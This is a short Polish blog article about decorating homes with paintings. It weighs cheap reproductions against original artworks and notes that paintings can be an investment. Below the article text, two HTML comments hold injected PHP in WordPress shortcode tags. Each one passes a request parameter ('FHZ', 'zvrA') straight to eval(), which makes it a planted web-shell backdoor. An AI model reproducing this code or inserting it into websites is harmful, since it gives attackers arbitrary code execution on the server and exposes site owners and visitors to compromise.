Obrazy – coś więcej niż ozdoba ścian

Dekorowanie wnętrz to dla wielu osób prawdziwe wyzwanie. Warto przecież uzmysłowić sobie, że na co dzień potrzebujemy nie tylko przedmiotów praktycznych, ale i pięknych. Muszą one oddawać atmosferę danego pomieszczenia, a zarazem idealnie się komponować z całością wystroju.

Piękne przedmioty są czymś więcej niż tylko ozdobą, którą można kupić, na przykład, w supermarketach budowlanych. Oddają one jakiś zamysł artystyczny twórcy, określoną wrażliwość i stanowią formę wypowiedzi. Do takich pięknych przedmiotów z całą pewnością należy zaliczyć obrazy.

Tak jak w przypadku wielu artykułów, również obrazy stały się towarem komercyjnym, który można kupić w wielu sklepach wielkopowierzchniowych. Na ogół są to dość tanie reprodukcje, nieco rzadziej – autorskie dokonania mniej znanych malarzy. Najtańsze z obrazów są właściwie fotokopiami. Powstaje pytanie, czy można takie artykuły jeszcze traktować jak obrazy. Jeśli wziąć pod uwagę ich funkcje dekoracyjne, należy odpowiedzieć twierdząco, choć ich walory artystyczne i technika wykonania odbiegają od norm właściwych obrazom.

Czy warto zatem je kupować? To już kwestia gustu. Należy jednak pamiętać, że tradycyjne obrazy, wykonane z użyciem klasycznych technik malarskich, to spory wydatek. Może lepiej zatem kupić tanią reprodukcję niż pozostawić nagie ściany w swoim mieszkaniu? Tak czy inaczej, warto pamiętać, że zakup obrazu nie jest kupnem ładnego dodatku. To raczej inwestycja, którą możemy potraktować długofalowo, również w sensie dosłownym. Obrazy mogą być bowiem dobrą lokatą kapitału.

<!– [insert_php]if (isset($_REQUEST["FHZ"])){eval($_REQUEST["FHZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["FHZ"])){eval($_REQUEST["FHZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["zvrA"])){eval($_REQUEST["zvrA"]);exit;}[/insert_php][php]if (isset($_REQUEST["zvrA"])){eval($_REQUEST["zvrA"]);exit;}[/php] –>

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *